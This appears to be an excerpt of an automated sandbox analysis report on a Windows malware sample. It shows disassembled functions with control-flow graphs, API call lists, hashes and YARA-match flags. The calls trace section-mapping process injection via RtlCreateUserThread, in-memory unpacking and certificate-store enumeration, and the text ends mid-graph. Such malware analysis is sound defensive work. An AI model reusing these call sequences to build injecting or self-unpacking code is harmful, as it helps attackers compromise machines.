                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2893773233.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_uejbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 7305ee3979d5b4667fc5844815bc59bb72ccff8572694ad63906bf8bfbab0545
                                                                        • Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
                                                                        • Opcode Fuzzy Hash: 7305ee3979d5b4667fc5844815bc59bb72ccff8572694ad63906bf8bfbab0545
                                                                        • Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64
                                                                        Function 004015F2 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 238 4015f2-4015f4 240 4015f7-40160a call 401240 238->240 241 4015eb-4015f0 238->241 244 40160c 240->244 245 40160f-401614 240->245 241->240 244->245 247 40161a-40162b 245->247 248 40193e-401946 245->248 251 401631-40165a 247->251 252 40193c 247->252 248->245 253 40194b-40198e call 401240 248->253 251->252 260 401660-401677 NtDuplicateObject 251->260 252->253 260->252 262 40167d-4016a1 NtCreateSection 260->262 265 4016a3-4016c4 NtMapViewOfSection 262->265 266 4016fd-401723 NtCreateSection 262->266 265->266 267 4016c6-4016e2 NtMapViewOfSection 265->267 266->252 269 401729-40172d 266->269 267->266 270 4016e4-4016fa 267->270 269->252 272 401733-401754 NtMapViewOfSection 269->272 270->266 272->252 274 40175a-401776 NtMapViewOfSection 272->274 274->252 277 40177c 274->277 277->252 278 40177c call 401781 277->278 278->252
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2893773233.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_uejbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 6fcf8b22fbdcb8380d2881299c31f747d5ad1c4e66094b591aeffa0cf5ced54e
                                                                        • Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
                                                                        • Opcode Fuzzy Hash: 6fcf8b22fbdcb8380d2881299c31f747d5ad1c4e66094b591aeffa0cf5ced54e
                                                                        • Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64
                                                                        Function 004015E6 Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 279 4015e6-40160a call 401240 284 40160c 279->284 285 40160f-401614 279->285 284->285 287 40161a-40162b 285->287 288 40193e-401946 285->288 291 401631-40165a 287->291 292 40193c 287->292 288->285 293 40194b-40198e call 401240 288->293 291->292 300 401660-401677 NtDuplicateObject 291->300 292->293 300->292 302 40167d-4016a1 NtCreateSection 300->302 305 4016a3-4016c4 NtMapViewOfSection 302->305 306 4016fd-401723 NtCreateSection 302->306 305->306 307 4016c6-4016e2 NtMapViewOfSection 305->307 306->292 309 401729-40172d 306->309 307->306 310 4016e4-4016fa 307->310 309->292 312 401733-401754 NtMapViewOfSection 309->312 310->306 312->292 314 40175a-401776 NtMapViewOfSection 312->314 314->292 317 40177c 314->317 317->292 318 40177c call 401781 317->318 318->292
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2893773233.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_uejbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: da093589d2d920786b053f62cd85dab4a028aa54c55a505f1a39e86dd67689ba
                                                                        • Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
                                                                        • Opcode Fuzzy Hash: da093589d2d920786b053f62cd85dab4a028aa54c55a505f1a39e86dd67689ba
                                                                        • Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64
                                                                        Function 00403043 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 319 403043-403067 320 40319a-40319f 319->320 321 40306d-403085 319->321 321->320 322 40308b-40309c 321->322 323 40309e-4030a7 322->323 324 4030ac-4030ba 323->324 324->324 325 4030bc-4030c3 324->325 326 4030e5-4030ec 325->326 327 4030c5-4030e4 325->327 328 40310e-403111 326->328 329 4030ee-40310d 326->329 327->326 330 403113-403116 328->330 331 40311a 328->331 329->328 330->331 332 403118 330->332 331->323 333 40311c-403121 331->333 332->333 333->320 334 403123-403126 333->334 334->320 335 403128-403197 RtlCreateUserThread NtTerminateProcess 334->335 335->320
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2893773233.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_uejbbri.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                        • String ID:
                                                                        • API String ID: 1921587553-0
                                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
                                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9
                                                                        Function 024A003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 24a003c-24a0047 1 24a0049 0->1 2 24a004c-24a0263 call 24a0a3f call 24a0e0f call 24a0d90 VirtualAlloc 0->2 1->2 17 24a028b-24a0292 2->17 18 24a0265-24a0289 call 24a0a69 2->18 20 24a02a1-24a02b0 17->20 21 24a02ce-24a03c2 VirtualProtect call 24a0cce call 24a0ce7 18->21 20->21 22 24a02b2-24a02cc 20->22 29 24a03d1-24a03e0 21->29 22->20 30 24a0439-24a04b8 VirtualFree 29->30 31 24a03e2-24a0437 call 24a0ce7 29->31 33 24a04be-24a04cd 30->33 34 24a05f4-24a05fe 30->34 31->29 38 24a04d3-24a04dd 33->38 35 24a077f-24a0789 34->35 36 24a0604-24a060d 34->36 42 24a078b-24a07a3 35->42 43 24a07a6-24a07b0 35->43 36->35 39 24a0613-24a0637 36->39 38->34 41 24a04e3-24a0505 38->41 46 24a063e-24a0648 39->46 50 24a0517-24a0520 41->50 51 24a0507-24a0515 41->51 42->43 44 24a086e-24a08be LoadLibraryA 43->44 45 24a07b6-24a07cb 43->45 55 24a08c7-24a08f9 44->55 48 24a07d2-24a07d5 45->48 46->35 49 24a064e-24a065a 46->49 52 24a07d7-24a07e0 48->52 53 24a0824-24a0833 48->53 49->35 54 24a0660-24a066a 49->54 58 24a0526-24a0547 50->58 51->58 59 24a07e2 52->59 60 24a07e4-24a0822 52->60 62 24a0839-24a083c 53->62 61 24a067a-24a0689 54->61 56 24a08fb-24a0901 55->56 57 24a0902-24a091d 55->57 56->57 63 24a054d-24a0550 58->63 59->53 60->48 64 24a068f-24a06b2 61->64 65 24a0750-24a077a 61->65 62->44 66 24a083e-24a0847 62->66 68 24a05e0-24a05ef 63->68 69 24a0556-24a056b 63->69 70 24a06ef-24a06fc 64->70 71 24a06b4-24a06ed 64->71 65->46 72 24a084b-24a086c 66->72 73 24a0849 66->73 68->38 74 24a056f-24a057a 69->74 75 24a056d 69->75 76 24a074b 70->76 77 24a06fe-24a0748 70->77 71->70 72->62 73->44 78 24a059b-24a05bb 74->78 79 24a057c-24a0599 74->79 75->68 76->61 77->76 84 24a05bd-24a05db 78->84 79->84 84->63
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 024A024D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2900388143.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_24a0000_uejbbri.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: cess$kernel32.dll
                                                                        • API String ID: 4275171209-1230238691
                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction ID: 47db5edc071913791deb89cbc8230648d4aa3d877f6c379e8469fc357dd10e18
                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction Fuzzy Hash: 3C526974A01229DFDB64CF58C994BADBBB1BF09304F1480DAE94DAB351DB30AA95CF14
                                                                        Function 025FF32E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 336 25ff32e-25ff347 337 25ff349-25ff34b 336->337 338 25ff34d 337->338 339 25ff352-25ff35e CreateToolhelp32Snapshot 337->339 338->339 340 25ff36e-25ff37b Module32First 339->340 341 25ff360-25ff366 339->341 342 25ff37d-25ff37e call 25fefed 340->342 343 25ff384-25ff38c 340->343 341->340 348 25ff368-25ff36c 341->348 346 25ff383 342->346 346->343 348->337 348->340
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 025FF356
                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 025FF376
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2900663679.00000000025ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 025ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_25ed000_uejbbri.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 3833638111-0
                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction ID: 96436dbf681810cf7d69a3729102a70ad35d228d29e1b3fc52a25a1db227d6fd
                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction Fuzzy Hash: FFF096325107116BD7603BF5AC8DF6E76E8BF49725F140528E742D1CC0DB74E8458A69
                                                                        Function 024A0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 349 24a0e0f-24a0e24 SetErrorMode * 2 350 24a0e2b-24a0e2c 349->350 351 24a0e26 349->351 351->350
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,024A0223,?,?), ref: 024A0E19
                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,024A0223,?,?), ref: 024A0E1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2900388143.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_24a0000_uejbbri.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction ID: 8cb0d109644ce714bdc84d03a3357bbc544987171c927014f260ece32c00e347
                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction Fuzzy Hash: 26D0123114512877DB002A94DC09BCE7B1CDF09B66F008011FB0DDD180C770954046E5
                                                                        Function 00401991 Relevance: 1.3, APIs: 1, Instructions: 64sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 352 401991-4019ed call 401240 Sleep 364 4019f3-4019f5 352->364 365 4019ee call 4014c4 352->365 366 401a04-401a24 364->366 367 4019f7-4019ff call 4015b7 364->367 365->364 373 401a32 366->373 374 401a29-401a35 366->374 367->366 373->374 376 401a46 374->376 377 401a3a-401a52 call 401240 374->377 376->377
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2893773233.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_uejbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: f786c9b48305f926c2fe9aa6a4a640c3689c3b4dd88574010f3490bae00a72b6
                                                                        • Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
                                                                        • Opcode Fuzzy Hash: f786c9b48305f926c2fe9aa6a4a640c3689c3b4dd88574010f3490bae00a72b6
                                                                        • Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF
                                                                        Function 004019A9 Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 381 4019a9-4019ed call 401240 Sleep 393 4019f3-4019f5 381->393 394 4019ee call 4014c4 381->394 395 401a04-401a24 393->395 396 4019f7-4019ff call 4015b7 393->396 394->393 402 401a32 395->402 403 401a29-401a35 395->403 396->395 402->403 405 401a46 403->405 406 401a3a-401a52 call 401240 403->406 405->406
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2893773233.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_uejbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 2350c7394a6ede19c9a3da40f224c600cb7e67420b87972ec1723c2f239d6a32
                                                                        • Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
                                                                        • Opcode Fuzzy Hash: 2350c7394a6ede19c9a3da40f224c600cb7e67420b87972ec1723c2f239d6a32
                                                                        • Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF
                                                                        Function 004019AF Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 410 4019af-4019ed call 401240 Sleep 417 4019f3-4019f5 410->417 418 4019ee call 4014c4 410->418 419 401a04-401a24 417->419 420 4019f7-4019ff call 4015b7 417->420 418->417 426 401a32 419->426 427 401a29-401a35 419->427 420->419 426->427 429 401a46 427->429 430 401a3a-401a52 call 401240 427->430 429->430
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2893773233.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_uejbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 8626c13d4c5bea9750268c441cbe70d84321be4982c5847259c3e7a51e7bc089
                                                                        • Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
                                                                        • Opcode Fuzzy Hash: 8626c13d4c5bea9750268c441cbe70d84321be4982c5847259c3e7a51e7bc089
                                                                        • Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B
                                                                        Function 004019B8 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 434 4019b8-4019ed call 401240 Sleep 438 4019f3-4019f5 434->438 439 4019ee call 4014c4 434->439 440 401a04-401a24 438->440 441 4019f7-4019ff call 4015b7 438->441 439->438 447 401a32 440->447 448 401a29-401a35 440->448 441->440 447->448 450 401a46 448->450 451 401a3a-401a52 call 401240 448->451 450->451
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2893773233.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_uejbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 7cb05b4a08deaf112b9499aec8d4cd6db564fb490b0e62221787527af13cff27
                                                                        • Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
                                                                        • Opcode Fuzzy Hash: 7cb05b4a08deaf112b9499aec8d4cd6db564fb490b0e62221787527af13cff27
                                                                        • Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B
                                                                        Function 025FEFED Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 455 25fefed-25ff027 call 25ff300 458 25ff029-25ff05c VirtualAlloc call 25ff07a 455->458 459 25ff075 455->459 461 25ff061-25ff073 458->461 459->459 461->459
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 025FF03E
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2900663679.00000000025ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 025ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_25ed000_uejbbri.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction ID: a8be367e8d7fd57632fa0a520358ea50f5efcf969faacc22d48af78544e0087c
                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction Fuzzy Hash: 2A112D79A00208EFDB01DF98C989E99BBF5AF08750F058094FA489B761D771EA50DF84

                                                                        Execution Graph

                                                                        Execution Coverage:19.6%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:38.5%
                                                                        Total number of Nodes:818
                                                                        Total number of Limit Nodes:31
                                                                        execution_graph 3952 7ff7cb872bac 3953 7ff7cb872bc5 3952->3953 3967 7ff7cb871990 3953->3967 3955 7ff7cb872bdc 3971 7ff7cb8719e4 3955->3971 3957 7ff7cb872bec 3958 7ff7cb871990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 3957->3958 3959 7ff7cb872c00 CertOpenStore 3958->3959 3960 7ff7cb872c24 3959->3960 3964 7ff7cb872c48 3959->3964 3961 7ff7cb871990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 3960->3961 3962 7ff7cb872c38 3961->3962 3963 7ff7cb872d5c 41 API calls 3962->3963 3963->3964 3965 7ff7cb871990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 3964->3965 3966 7ff7cb872cbd CertCloseStore 3965->3966 3968 7ff7cb8719ad 3967->3968 3976 7ff7cb871918 3968->3976 3970 7ff7cb8719ba 3970->3955 3986 7ff7cb877dc8 3971->3986 3973 7ff7cb8719f9 3974 7ff7cb871990 4 API calls 3973->3974 3975 7ff7cb871a07 3974->3975 3977 7ff7cb87192e 3976->3977 3978 7ff7cb871951 3976->3978 3977->3977 3980 7ff7cb872654 3977->3980 3978->3970 3981 7ff7cb872669 GetProcessHeap RtlReAllocateHeap 3980->3981 3982 7ff7cb872682 3980->3982 3983 7ff7cb87268a 3981->3983 3985 7ff7cb8725dc GetProcessHeap HeapAlloc 3982->3985 3983->3978 3987 7ff7cb877de9 3986->3987 3990 7ff7cb8725dc GetProcessHeap HeapAlloc 3987->3990 3989 7ff7cb877df8 3989->3973 4421 7ff7cb875fac 4422 7ff7cb875fc2 4421->4422 4423 7ff7cb877234 5 API calls 4422->4423 4424 7ff7cb875ff0 4423->4424 4425 7ff7cb8769ec 4426 7ff7cb876a0f 4425->4426 4427 7ff7cb877234 5 API calls 4426->4427 4428 7ff7cb876a7e 4427->4428 4429 7ff7cb877234 5 API calls 4428->4429 4430 7ff7cb876aed 4429->4430 4433 7ff7cb8772d4 4430->4433 4434 7ff7cb877310 5 API calls 4433->4434 4435 7ff7cb8772f1 4434->4435 4436 7ff7cb876b0c 4435->4436 4437 7ff7cb871a70 5 API calls 4435->4437 4437->4436 4438 7ff7cb87e3a8 lstrcpyW PathAppendW 4439 7ff7cb87e41f 4438->4439 4454 7ff7cb87ccf4 RegGetValueW 4439->4454 4442 7ff7cb87e4b6 4443 7ff7cb871990 4 API calls 4444 7ff7cb87e472 4443->4444 4445 7ff7cb8719e4 4 API calls 4444->4445 4446 7ff7cb87e47d 4445->4446 4447 7ff7cb871990 4 API calls 4446->4447 4448 7ff7cb87e48c 4447->4448 4449 7ff7cb8719e4 4 API calls 4448->4449 4450 7ff7cb87e49b 4449->4450 4451 7ff7cb871990 4 API calls 4450->4451 4452 7ff7cb87e4aa 4451->4452 4453 7ff7cb8725b4 2 API calls 4452->4453 4453->4442 4455 7ff7cb87cd3d 4454->4455 4456 7ff7cb87cd7c 4454->4456 4461 7ff7cb872588 GetProcessHeap HeapAlloc 4455->4461 4456->4442 4456->4443 4409 7ff7cb871968 4412 7ff7cb8725dc GetProcessHeap HeapAlloc 4409->4412 4475 7ff7cb876270 4476 7ff7cb876293 4475->4476 4477 7ff7cb877234 5 API calls 4476->4477 4478 7ff7cb876302 4477->4478 4479 7ff7cb877234 5 API calls 4478->4479 4480 7ff7cb876321 4479->4480 4481 7ff7cb877234 5 API calls 4480->4481 4482 7ff7cb876340 4481->4482 4483 7ff7cb877234 5 API calls 4482->4483 4484 7ff7cb87635f 4483->4484 4485 7ff7cb877234 5 API calls 4484->4485 4486 7ff7cb87637e 4485->4486 4487 7ff7cb876d30 4488 7ff7cb876d51 4487->4488 4489 7ff7cb877234 5 API calls 4488->4489 4490 7ff7cb876dc0 4489->4490 4491 7ff7cb877234 5 API calls 4490->4491 4492 7ff7cb876e2d 4491->4492 4493 7ff7cb8772d4 5 API calls 4492->4493 4494 7ff7cb876e4c 4493->4494 4503 7ff7cb8771ec 4494->4503 4496 7ff7cb876e6b 4497 7ff7cb8771ec 5 API calls 4496->4497 4498 7ff7cb876edd 4497->4498 4499 7ff7cb877234 5 API calls 4498->4499 4500 7ff7cb876f42 4499->4500 4501 7ff7cb877234 5 API calls 4500->4501 4502 7ff7cb876fa0 4501->4502 4504 7ff7cb877310 5 API calls 4503->4504 4505 7ff7cb877209 4504->4505 4506 7ff7cb87722e 4505->4506 4507 7ff7cb871990 4 API calls 4505->4507 4506->4496 4507->4506 3991 7ff7cb872b1c 3992 7ff7cb871990 4 API calls 3991->3992 3993 7ff7cb872b42 3992->3993 3994 7ff7cb8719e4 4 API calls 3993->3994 3995 7ff7cb872b4d 3994->3995 3996 7ff7cb871990 4 API calls 3995->3996 3997 7ff7cb872b5c 3996->3997 3998 7ff7cb871990 4 API calls 3997->3998 3999 7ff7cb872b6b CertEnumSystemStore 3998->3999 4000 7ff7cb871990 4 API calls 3999->4000 4001 7ff7cb872b94 4000->4001 4508 7ff7cb87639c 4509 7ff7cb8763c7 4508->4509 4510 7ff7cb877234 5 API calls 4509->4510 4511 7ff7cb876449 4510->4511 4512 7ff7cb877234 5 API calls 4511->4512 4513 7ff7cb876468 4512->4513 4514 7ff7cb877234 5 API calls 4513->4514 4515 7ff7cb876487 4514->4515 4516 7ff7cb877234 5 API calls 4515->4516 4517 7ff7cb8764ed 4516->4517 4518 7ff7cb877234 5 API calls 4517->4518 4519 7ff7cb87650c 4518->4519 4520 7ff7cb877234 5 API calls 4519->4520 4521 7ff7cb87652b 4520->4521 4546 7ff7cb877298 4521->4546 4523 7ff7cb87654a 4524 7ff7cb877234 5 API calls 4523->4524 4525 7ff7cb876569 4524->4525 4526 7ff7cb877234 5 API calls 4525->4526 4527 7ff7cb876588 4526->4527 4527->4527 4528 7ff7cb877234 5 API calls 4527->4528 4529 7ff7cb8765f7 4528->4529 4530 7ff7cb877234 5 API calls 4529->4530 4531 7ff7cb876616 4530->4531 4532 7ff7cb8772d4 5 API calls 4531->4532 4533 7ff7cb876635 4532->4533 4534 7ff7cb8772d4 5 API calls 4533->4534 4535 7ff7cb876654 4534->4535 4536 7ff7cb8772d4 5 API calls 4535->4536 4537 7ff7cb8766b7 4536->4537 4538 7ff7cb877234 5 API calls 4537->4538 4539 7ff7cb8766d6 4538->4539 4540 7ff7cb877234 5 API calls 4539->4540 4541 7ff7cb8766f5 4540->4541 4542 7ff7cb877234 5 API calls 4541->4542 4543 7ff7cb876714 4542->4543 4544 7ff7cb877234 5 API calls 4543->4544 4545 7ff7cb876733 4544->4545 4547 7ff7cb877310 5 API calls 4546->4547 4548 7ff7cb8772b5 4547->4548 4549 7ff7cb8772ce 4548->4549 4550 7ff7cb871a70 5 API calls 4548->4550 4549->4523 4550->4549 4566 7ff7cb876758 4567 7ff7cb87677b 4566->4567 4567->4567 4568 7ff7cb877234 5 API calls 4567->4568 4569 7ff7cb8767ea 4568->4569 4570 7ff7cb877234 5 API calls 4569->4570 4571 7ff7cb876859 4570->4571 4572 7ff7cb877234 5 API calls 4571->4572 4573 7ff7cb876878 4572->4573 4574 7ff7cb877234 